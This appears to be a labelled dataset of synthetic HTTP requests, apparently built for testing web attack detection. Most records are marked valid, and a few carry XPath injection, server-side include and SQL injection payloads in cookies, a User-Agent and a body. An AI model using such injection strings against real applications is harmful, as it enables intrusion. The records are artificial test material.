If-Modified-Since: Fri, 04 Feb 05 15:44:47 UTC
If-Unmodified-Since: Wed, 20 Jun 07 16:20:11 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Sep 08 04:20:52 UTC
Max-Forwards: 342
MIME-Version: 3.1
Pragma: ry4rPld='ns'
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: kEaze4 opcmCc=eoie
Range: -15
Referer: http://re7ii.com/atmeI/in8Eon3.jpeg
TE: gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/4.4 (compatible; MSIE 1.5; Mac OS X; ea5aO1; waivl; iadss)
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0823x5331
Via: HTTP/4.6 93.16.127.205:57
Transfer-Encoding: compress
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35864
Start - Id: 11693
class: Valid
GET /hbln1idtt2tarutl6RiU/niaeiee/eTJXrG/evaxyftm/S1uIJmcS_LsY4Pn/rWzpPKr9VZw9T6WxX0Da.jpg?3iw=5288898686&@pOQguQ6httpshj=%28mHme0nst0union&ciot7u2t1Dq=59455&iethSgI=vrtIdexecd&4conioocbeoai=ttea&autiuMmnlr1a=x6itjhociEnziN&vtn=aVeqvWMak_k&VK_bgsoundSE=04255&tutsyYa0sTsav=56&ARvi7dvUnYPc=rcp7sechtgauxaT&qH0g=7rfHfUD&Esa=5oe&qHthfi=dl6e HTTP/1.1
Host: www.g4shAnnfT.it
Connection: tf9dirc
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 231.66.203.222
Cookie: blbxhai=eaf;peaciwrMildsol=ohnI
Cookie2: $Version="29"
Date: Sat, 01 Mar 08 21:41:20 GMT
ETag: W/"vlPTD9@nIM@0fyK2eaZ1"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Fri, 05 Jan 07 18:56:06 GMT
If-Unmodified-Since: Thu, 15 Jan 09 17:08:46 GMT
If-Match: "OpS0VcNF@sU4ZiM"
If-None-Match: "nrVMbXET-OW9mrVeh"
If-Range: *
Max-Forwards: 072
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: twpMe uicno=39Bzetg
Range: 345-226
Referer: http://www.innmti.be/lfte9o.asp
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 5.3; c0-ev; rv:8.8.5) Gecko/65585593
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9315x6291
Via: pasC/7.6 www.7yoae.html, 8.4 14.149.225.111, HTTP/0.2 www.vhdlws.png
Transfer-Encoding: compress
Upgrade: egst/3.3
Warning: 413 www.nrtr4.htm "0pki8Efph5ybOudthtc" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11693
Start - Id: 50067
class: XPathInjection
POST /cXw-4iHPgCb_zDg@/a7qzmJDwLu/AKX2pZEx/feOT0QlEyCfSovUe/ndrGe9hay2AsiaOh/uc61gY84K_nq/smslOiB_X7M_HffdaCwx/xetfzezgcfyWhync2to.shtml? HTTP/1.1
Content-Length: 17
Content-Language: crug
Content-Encoding: deflate
Content-Location: http://www.htnshb2.biz/ee3lIF/syhpDIs.cfm
Content-MD5: Y2Ftb3VIc3VybmRlYzVubA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 May 06 09:06:32 GMT
Last-Modified: Tue, 09 Mar 10 06:23:58 CET
Host: 227.174.82.199
Connection: idh4eIs
Accept: audio/*, image/jpeg;q=0.6, application/*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress;q=0.6, compress, deflate;q=0.0
Accept-Language: tiioft-r3die
Cache-Control: no-store
Client-ip: 9.5.7.184
Cookie: UftpiselectNTaccept@K1D4=N;mu=6q/CieUs/hthu5t/child::node()[    position()=81]  |  eqasiE/eayqu/eotdnM/child::text()[position()=37]    or    '8tndUolt'  =    ';leoscaUSxodue=ann
Cookie2: $Version="067"
Date: Thu, 29 Mar 07 18:28:04 GMT
ETag: W/"o84DSnf9nsx7fsrrg"
Expect: 100-continue
From: btorof@elber.it
If-Modified-Since: Sat, 15 Oct 05 22:23:35 GMT
If-Unmodified-Since: Sat, 26 Aug 06 07:10:16 GMT
If-Match: "3p.b.KGpiqrN..9ec"
If-None-Match: *
If-Range: Wed, 03 Nov 04 14:00:25 GMT
Max-Forwards: 01
MIME-Version: 2.6
Pragma: no-cache
Authorization: NTLM aWVlbXR0aW9taDJHdFlsb2h0dG5vYmV0c3RkZXBsd25mYmE3b3RoZ29Udw==
Range: -38344,41-
Referer: /tNeny/eto2tsh3/uhe4cojA.sh
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/7.7 (Windows; U; Windows NT 6.7; re-Ft; rv:5.2.5) Gecko/15011245
UA-OS: Mac OS X
Via: FTP/9.9 29.13.161.47, 0.0 205.158.222.224
Transfer-Encoding: gn1o; hTss=orfei
Upgrade: nteEi/0.1
Warning: 123 196.148.158.182 "Ymsriob8iitrsuaoTn" "Sat, 17 Jan 04 13:32:01 GMT"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xr7XNgxp_7J=onath

End - Id: 50067
Start - Id: 11259
class: Valid
GET /0E7FformIKRfAc/eNXH.0lUt@Ym9Q_CHM/tuIqZpM2QPlnP/hDm7V_YiN83@S7/URBFRJICCy/gS3l4Tk/tpUrKM66/dc5qy78zirkRu/2Blse5tedur5n8rntU.sh?mheleah=55338&tcjHn=vN&8LKB=na9S&lcersh=isituGw8&meoe=eHeo&vLTf7lG=64&niEtirsdj4ti=c%3CIstyleIrmr+g&nteMlioufntafan=843&5oT=ilg5yesnganvlo&rwe=iet%3Aawc4%5D%24%5B%5Cayalllfsservices4&hesgdy6cnlrvaN=eI3gRQVRi&qRW9A=771&ccIch83enniaes=3202391 HTTP/1.1
Host: www.eoatlwn.cz:0
Connection: keep-alive
Accept: application/*;q=0.3, video/*, audio/basic;q=0.1
Accept-Charset: windows-1250, iso-8859-15, iso-8859-8
Accept-Encoding: *;q=0.9
Accept-Language: e-revdahq, rtefa-sj;q=0.5
Cache-Control: no-cache
Client-ip: 18.129.154.157
Cookie: M5cZgroup byt9h.fE=>a;YeZcdm4I@E=saft;fersrg=aytdeighePr;d4RC=49wa4aoHqM8o;HNqvqZ_AqYEphp=na;rtetia2e=sTxz_4nVp_
Cookie2: $Version="475"
Date: Sat, 18 Dec 04 22:06:46 UTC
ETag: "r6cFlT69xgKl84H"
Expect: e7exuse9
From: aarli@mLmeltu.be
If-Modified-Since: Thu, 25 Mar 04 20:04:13 GMT
If-Unmodified-Since: Wed, 02 Jan 08 14:03:31 GMT
If-Match: "JQqgoMb332Y6iffww7LP"
If-None-Match: "rzDyXJlnLVsl6bMm"
If-Range: "IsC4l7_gn0aOoZS.Gfb"
Max-Forwards: 4005
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: Digest uri=http://eYaez.uk/sgdslzo4/iedthrvG/xusueg/l3ni.cgi
Range: 394051-208299
Referer: /6aytj.bin
TE: deflate,gzip,chunked
Trailer: Pragma
User-Agent: Mozilla/9.7 (Windows; U; Win98 1.8; tg-dw; rv:3.3.5) Gecko/08623466
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 234x2210
Via: 7.6 142.84.149.157, 4.4 243.98.93.95
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11259
Start - Id: 27282
class: Valid
GET /r1G6I_/oOewm/e2KRm/ezda2Hv5eHO0sKyW_gSt/lotdapY6ldait.jpeg?TelmeDlobvs=l6tt+9wa&wsc=7592482735&lZ7h=524&Nldemmkshuedr=dU9KTvLh9dX&oeszieok=Sio0ian&l5KI=sock_streamliw&a5n5stdLelB=rte HTTP/1.1
Host: www.amM42otai.com
Connection: taasea
Accept: audio/*, image/*;q=0.7, image/png
Accept-Charset: *;q=0.0
Accept-Encoding: compress
Accept-Language: 3oo-nhe, tmvdld6-rh, S-c
Cache-Control: a='0'
Client-ip: 178.54.145.217
Cookie: hHiorSW=02
Cookie2: $Version="874"
Date: Tue, 01 Jun 04 18:52:51 GMT
ETag: W/"dZdeLIIail_Zlt0UZ"
Expect: bA0obtea=tHrYeoee;ioPneR
From: Dt21hm@sbe22sjbhs.com
If-Modified-Since: Wed, 25 Jun 08 21:19:48 GMT
If-Unmodified-Since: Tue, 13 Apr 04 09:37:05 UTC
If-Match: "-kOXu1HPPfwi7LQJeqrV"
If-None-Match: "a4AuocEA3O_Fe7w"
If-Range: Wed, 05 Jul 06 18:08:37 CET
Max-Forwards: 941
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dG1ucmlod2lyY3R0dHlvaGtldG5oc2xzdWRoN1h4bmV5Tm9laGVpZGdk
Authorization: Digest username="4arjfzEs"
Range: 392-,66898-,-0761
Referer: http://smnebrnm.it/tccndrl/fprm.doc
TE: trailers
Trailer: Warning
User-Agent: hipeoms7howxeato
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6912x6352
Via: 9.5 57.13.234.143, 2.4 www.iat2o.gif:9435, HTTP/9.4 www.liea.jpg
Transfer-Encoding: deflate
Upgrade: rQ2sO/0.1, ote/0.2
Warning: 238 180.27.15.55 "t7r8dlbisjtoofgu" "Tue, 07 Feb 06 13:03:45 CET"
X-Forwarded-For: 174.19.75.112
X-Serial-Number: 75164077038098175
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27282
Start - Id: 35021
class: SSI
POST /enaAioasfXkroIr/@xp_gbsTAT0/j8q/9J-15aV.TzfwYEBWhSa/t-XUfN/qOdtrrbrdc4uDEhsect/6IformsV_rraE/GQgRfdn@a2SD/nunaEbmefepeslrgrn/riTlinsx/hded@LfvB_/saioimpaetu2c3eaZten.dll? HTTP/1.1
Content-Length: 214
Content-Encoding: deflate
Content-Location: http://www.eFae.cz/lxisOb.jsp
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Feb 08 07:39:56 GMT
Last-Modified: Thu, 05 Mar 09 11:29:07 GMT
Host: 137.169.61.28:2532
Connection: 3ntaaYt
Accept: audio/*, audio/x-wav;q=0.5, application/*;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Date: Mon, 17 Sep 07 15:47:49 CET
ETag: W/"ffgGKMATuV9EEVx"
If-Match: "jJCNUmW8A09BqTpSyO"
If-Range: Sat, 17 Jan 09 13:54:13 GMT
Max-Forwards: 9
Proxy-Authorization: NTLM YXRsNnRhYWxsdGFzM2RvbHRrdGlpMnVmZWF0RXRvU3BhZw==
Referer: http://www.ezus.ch/ewssuna/ieosl/eonH.bin
User-Agent: <!--   #odbc   statement= "select jg,    ie6uqjhb,  oatesi4a from be4sn order  by   6, 16,    5"  -->

aheae5utcCrcr7=nneVngstb0>aeee&o3wWOXo=fsa4e2%leescc&eaOnwsnlawOAe=vS&eae02i=c9|ehneeo&fhf5= jI\mnthb~&gz6rOsets=servicesj &esyp8r=h Oigroup by|ev3audn&3Ar3A_8yA9=sfQoY&ucdonsrfdh=x&2ir=nv] allhttpsnl

End - Id: 35021
Start - Id: 25008
class: Valid
GET /yF-_eX/ng91nELLQS3/FsoandiEfq/nuese1Ussn/eg.5eF9U8/rD9L0Yk43oW7Awx/thUkM6xqiXCUa/temeeRtntdogA5devnoa.asp?o1r4mtdtet8s=le1sn6igwi&oEegaduYwwr=tolw45Dt7ra&8t=5rtie&yknL=9939605&edtb=139&swQGTKzK7=bin&Xihhsia=ru&lae=nnfr9wfoA9nd%5D HTTP/1.1
Host: 30.30.141.111
Connection: close
Accept: audio/x-wav, application/*
Accept-Charset: big5;q=0.5, iso-8859-15, iso-8859-3, euc-kr;q=0.7, gb2312;q=0.7
Accept-Encoding: *
Accept-Language: eE-tcf, icetnk-esyacl;q=0.5, l0psibr-drnCE4F, nis-mdnleesl, hdaemahs-rhl
Cache-Control: no-cache
Client-ip: 228.105.254.173
Cookie: WsyAFFnW=169;onicewa5o=xnh=gh;Tisroomnat7A=9301539
Cookie2: $Version="7"
Date: Thu, 10 Nov 05 09:20:24 GMT
ETag: W/"0Hvg@u8X5QAlknvgh7rb"
Expect: 100-continue
From: o4oia@etet.cz
If-Modified-Since: Fri, 03 Apr 09 09:19:01 CET
If-Unmodified-Since: Mon, 05 Oct 09 10:06:27 GMT
If-Match: *
If-None-Match: *
If-Range: "fcwd_CgMbeD0QuU"
Max-Forwards: 359
MIME-Version: 8.5
Pragma: se='nr'
Proxy-Authorization: 2cetnc heTr=rcamx1k
Authorization: Basic em10dGRMOml3bGllaHI=
Range: 46-,280-2255,32588-
Referer: /En4ln/sitcsic/hlei.nsf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 5.8; yn-ep; rv:0.0.6) Gecko/25991976
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 669x906
Via: 3.5 www.lbzsssn.html
Transfer-Encoding: compress
Upgrade: qrr/1.4, tcee/4.7, etrlFl/9.5, ehb/4.8
Warning: 482 www.seye8.css "Ys4oert7ti" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 92423943597
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25008
Start - Id: 11845
class: Valid
GET /oZl/t@.g-467b3/ZvSUtmprteL/kteiyqms44spiyYs/sgCtaeagratio/qayieeSeisheOphEoaer/sAWuZqncCcWX/qC.mspx?Mbxsbh=120549&usnceu=oclzsh&kLtkec=iEyFY4&YvupdateKcmdW5_ov=9523380&Ecuut8r=Bsx&loteesenle=si&kd9aLt1nfq=te&Xdn=npJH&eyl4pt8yossih0=989423949&NVfUe9G=amZcHhiN&ystlesg2n=703 HTTP/1.0
Host: 134.96.24.37
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1251, x-mac-arabic;q=0.3
Accept-Encoding: *
Accept-Language: lSq-0ln9dse;q=0.7, ws-Rtws6, i-tasmt, asSdorH-ehaeieer;q=0.3, tnjieoR-t;q=0.7
Cache-Control: min-fresh=6034
Client-ip: 18.97.57.49
Cookie: dtrtIa7ftas=e-3bBM1hAvxv;d5eimnnmmdejrI=3238;ad7orfeUiqlma=hlOaeHxa?gvbscriptnhn;i8ijtcoPstSar0g=hAd aticeebstdinrtaetcpe;l9IbseaarT8ma=a1ND
Cookie2: $Version="06"
Date: Sat, 27 Nov 04 22:42:10 GMT
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: 100-continue
From: keldk0a@nmntas.st
If-Modified-Since: Fri, 07 Jul 06 19:14:35 GMT
If-Unmodified-Since: Tue, 29 Aug 06 08:23:45 CET
If-Match: *
If-None-Match: *
If-Range: "JAl2h8dgjsFhhZeKR54s"
Max-Forwards: 012
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: Digest nonce
Range: 58-5013
Referer: /eymiure/it5la2.css
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 7.5; sh-3g; rv:0.5.8) Gecko/62144435
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: identity
Upgrade: qeona/2.2, e3aae/0.6
Warning: 718 147.248.189.45 "re6sEeAri" "Sat, 03 May 08 05:42:37 UTC"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 3151909596780283547
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11845
Start - Id: 41391
class: SqlInjection
PUT /nCR5hMwLMt3.nsf? HTTP/1.1
Content-Length: 176
Content-Language: gi,nsarrOl1,ar3
Content-Encoding: identity
Content-Location: http://www.5pfwq.st/ahnknmp.php3
Content-MD5: ZXpobjhoaG9uZGhzdFM3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Dec 05 19:26:51 GMT
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: www.j7Urstb.be
Connection: close
Accept: application/*;q=0.9, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Abootk-ceH;q=0.5, uthRsiEd-ptt4pl;q=0.3, n-2toL, fsn5tdth-z0az5is2, is-ngAakn5u;q=0.8
Cache-Control: max-age=6
Client-ip: 65.244.212.38
Cookie: ihnte1afytgnrlH=rygo@yvC55J;qNsu4ramn=76182;DlovanzceGmneia=8
Cookie2: $Version="98"
Date: Thu, 18 Nov 04 06:47:15 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: Ezwosie
From: eoiypoA@6niCt.fr
If-Modified-Since: Sun, 11 Sep 05 03:08:01 UTC
If-Unmodified-Since: Mon, 31 Mar 08 15:25:14 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 07 May 08 03:15:46 CET
Max-Forwards: 79
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM dm9sZk1jT250TGh3c3pveWlSaWRuYmV0YnJzRnJyOXJ0bGFlYXQ0
Range: 711-
Referer: http://s0st.fr/amUea/ncfiaubp/ohzae.css
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: aOca4ba7/3.2.7.5.6
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1178x5140
Via: 8.9 www.84aAHl.js, FTP/3.8 238.20.111.213:90916
Transfer-Encoding: identity
Upgrade: i0t/1.0, giat/1.3
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

qhhdi91=' OR   'wne'     = N' &ghtikcesircctM=eFFEq&Rin9rseadsmhnn=idg6so8documentae&DootnaoTfotn=uli&ancldebele=c&taNinh=$a&KPHKSqN8A_q_=88&T2nxp_WeperldB=lhEHHy.5

End - Id: 41391
Start - Id: 34040
class: Valid
POST /usrhavingd-vo3O6s/mFDtYJEM@GVZfp6YALg/snWpBxUtDkVXvw/7eDBXboDig6M2F/tp8Xdg_GN/d3Y/ZZTconnectANO_ujf/apBPsLPW.swf? HTTP/1.1
Content-Length: 85
Content-Language: eeehtt
Content-Encoding: identity
Content-Location: /ehi0po/rnkdvk/esodm.sh
Content-MD5: MXE4OGVvaWFvcmFhM2F3aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Mar 07 10:05:19 UTC
Last-Modified: Fri, 23 Feb 07 04:39:30 GMT
Host: 85.90.106.1:80
Connection: dvNl
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ngnu-ddooua;q=0.6, gtaeav-oBt3te;q=0.5
Cache-Control: no-store
Client-ip: 98.173.105.29
Cookie: eo6sxoodeea=2208;kh5i6oy3atwa=gandGdcatsadtmp$+p;izawGd=4gslltertUattiw;tfqwp=yxAwP
Cookie2: $Version="68"
Date: Tue, 13 Feb 07 18:45:12 CET
ETag: "8Qy4-A@WT@JdmVTT6"
Expect: urgclmR=tame3ii;etsbwiO=d770ef
From: nfaArT@c8eeenfHb.org
If-Modified-Since: Sat, 12 Jul 08 08:58:29 GMT
If-Unmodified-Since: Mon, 31 Jan 05 17:00:16 GMT
If-Match: "M@c18vzUnSRaD8-"
If-None-Match: *
If-Range: Tue, 16 Jan 07 10:23:03 GMT
Max-Forwards: 7
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest realm
Range: -72
Referer: http://www.DovQict.st/uiFcgc/Dtte/3zir/uogaofo/nln4Ir.tiff
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: gtweowrohHeelc
UA-CPU: PowerPC
UA-Disp: 027,841,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 682x2942
Via: FTP/6.4 www.Oeen7x.html, 2.7 www.aheMfemp.js
Transfer-Encoding: oeyadi; u9tPds=rhtsPf
Upgrade: anaia/9.7, aiu/9.9, oWi5re/8.7
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 312663342
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

abMei=nvq &1oUT7q=teA&atnjspprf=(7 &WTaLT21=locationN3e&ghi=nicnElnkl&thl9cdcn=nNo 

End - Id: 34040
Start - Id: 2294
class: Valid
GET /2elKI/1uOollsetee/rKwm4b/aW5jW9Wz_Xrb.7/onmNelwbslemndaa/IqRmwindow.openid/vxTQarQ89bL/nH0THr2cND0-yFVShN.sh?oeG=13261865&71anI=exdtlsjEiathse&tntisaeido=266021151&rw=odbwsbneietnasoO&nU6b=88173876&6ensbyaooLeEI8=My&QsUj=0H01group+byls9j-ewgete6m&fszRoetes=56T&k7IqemrdhdDM2ks=deal2r&ISBenhwiFtty=7ia HTTP/1.0
Host: 21.70.220.200:80
Connection: swiuia
Accept: application/zip;q=0.5
Accept-Charset: iso-8859-9;q=0.7, gb2312;q=0.7, x-mac-arabic;q=0.8, isiri-3342
Accept-Encoding: *
Accept-Language: ae-3, te4-Hhmt;q=0.4, s2topip-o5nEl, semuu-ase
Cache-Control: no-transform
Client-ip: 39.40.75.177
Cookie: kVDconnectTmy1WH=afSth]OxcbetweeneEooe\lkeh;api7aeylle=s33o~9tajQl+[bin&nx4;v3WpniNJWxUr=sFycsAB;nbww=rhttpszhfrdocument;Wjjeztyfkmm7he=61248
Cookie2: $Version="8"
Date: Wed, 04 Aug 04 10:52:33 CET
ETag: W/"lNqUNaPov_L-Lu5n"
Expect: 100-continue
From: Epwt@mIbard.com
If-Modified-Since: Tue, 21 Jun 05 04:05:56 CET
If-Unmodified-Since: Thu, 10 Jan 08 24:21:22 CET
If-Match: *
If-None-Match: "hPV1qoCRFqJ7e5p"
If-Range: *
Max-Forwards: 709
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM OHdjc2xva2VhcmVzZXNsMTNhc2FlM2x1Y2FyM2hhZXJjMlBl
Authorization: mieIN frf5oprp=1rjel
Range: 737-
Referer: /bceslox.jpg
TE: chunked;q=0.3,gzip;q=0.5,trailers
Trailer: Accept
User-Agent: ebaen (cb1yKMnup; iyV7KZs; axyIBEB; iwV5@VQM; tQDgICh)
UA-CPU: 68000
UA-Disp: 090,2073,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6264x742
Via: iln/1.2 www.uLedii.html:8, gLv/8.6 39.80.212.7
Transfer-Encoding: vTiuc
Upgrade: tjntna/3.8, spuo/6.9, tzncn/7.1, t2eh0/6.3
Warning: 647 238.244.132.185 "flrteahMclhsa" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2294
Start - Id: 16431
class: Valid
GET /aoh/tra.pl?iXAn-57@FGcat=30901&veeIt=n%28nky&PAQ48zTDBX=86434854&dqrnkdd1=+D2Enfromhbodyt+q%26O%3B&ea=Fi+4rerejlaDit8eh&4Vv2=Ism&ualSp=%3C2ifs&-5Mcat_having=e0.HqE0&5var5refdBpIv=451008849&norsTt2ophata=en%3C%3Cpt&oNenieWNtl=aQ_Bq.&aqosr5nserhoesg=nraeO&jTew1caht=4 HTTP/1.0
Host: www.hhhbu.org:80
Connection: close
Accept: image/*, text/html;q=0.6, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.3, deflate;q=0.5, gzip, compress;q=0.8
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 144.132.200.249
Cookie: dptiteeeep=886;robee=4dB;rte=gonph-ohttpslocationu]tf
Cookie2: $Version="734"
Date: Sat, 11 Jun 05 13:02:44 CET
ETag: W/"hJPD8bgYheR0d14VFiMI"
Expect: 100-continue
From: Sgspznl@eul4hW.net
If-Modified-Since: Fri, 11 Jun 04 06:32:18 GMT
If-Unmodified-Since: Thu, 30 Jul 09 16:59:05 CET
If-Match: "2KDLKhGgXEQyXHYgDn_C"
If-None-Match: "aH5Ysugv0C4lVtOjKUIR"
If-Range: Mon, 25 Jan 10 18:58:22 GMT
Max-Forwards: 9
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YXRkdHRoczpuZWFuZQ==
Range: -9,903164-,-40
Referer: /zoEl0T/yOoute/xeqcets/iakr.wav
TE: chunked;q=0.0,trailers,gzip
Trailer: Date
User-Agent: dfhwatst/4.2
UA-CPU: StrongARM
UA-Disp: 227,815,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4066x2541
Via: 6.7 8.125.212.13, HTTP/1.2 www.aOauatfr.gif, 6.1 www.Tliioo2.css
Transfer-Encoding: gl9i; trirImc=rxf7b
Upgrade: pom/4.4, bephn/1.8, ozrlG/0.2, ahr/9.6, ib30/7.5
Warning: 421 141.32.227.122 "neei3Elooa" "Sun, 21 Sep 08 19:22:11 CET"
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 3885571205
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16431
Start - Id: 11843
class: Valid
GET /fstnP/a9u/deHs.dll?RaSsAtbDO=1222090&a8hn6iscxiT=aEeseasr&eehEhw2=249468&C3xCZo4-O=23992&ny1r75oieoig=m&h3NEsedslaysez=update7%7Eechoaroet%26yesOta+ti&lsncco=i+hoo%3F%5BeinullS&VXY.wO5C=oNA6.y0TTdr&ae=1suAa HTTP/1.0
Host: www.t3ewlhnnle.gov
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip, gzip;q=0.5, identity;q=0.7
Accept-Language: sHEsr-qimsttt;q=0.9, h-rnt2iroh;q=0.3, sasoeMt-lEnui8h;q=0.9, tcsMorea-oj6rn
Cache-Control: max-age=4
Client-ip: 234.205.128.254
Cookie: dtrtIa7ftas=e-3bBM1hAvxv;d5eimnnmmdejrI=3238;ad7orfeUiqlma=hlOaeHxa?gvbscriptnhn;i8ijtcoPstSar0g=hAd aticeebstdinrtaetcpe;l9IbseaarT8ma=a1ND
Cookie2: $Version="06"
Date: Thu, 09 Nov 06 23:11:19 GMT
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: hheiA3
From: keldk0a@nmntas.st
If-Modified-Since: Fri, 13 Jul 07 16:39:51 UTC
If-Unmodified-Since: Tue, 29 Aug 06 08:23:45 CET
If-Match: *
If-None-Match: ".uBkgZoK3t-IBLX8wD"
If-Range: "JAl2h8dgjsFhhZeKR54s"
Max-Forwards: 40
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: NTLM d2s4bXB0dG5GYXdtbml0MnRpT25rZTJrdGxybDhNZ29p
Range: 93-,9-,27-9587
Referer: http://www.ouge5.be/9v69/7ehuoa/soou/satm00e/dires.msf
TE: deflate;q=0.1
Trailer: Accept-Language
User-Agent: oMv1Q1 http://www.ad4lvo.cz
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: identity
Upgrade: qeona/2.2, e3aae/0.6
Warning: 306 www.pYnI4i.jpg "ed1rpe" "Tue, 10 Mar 09 11:56:29 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 3151909596780283547
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11843
Start - Id: 9455
class: Valid
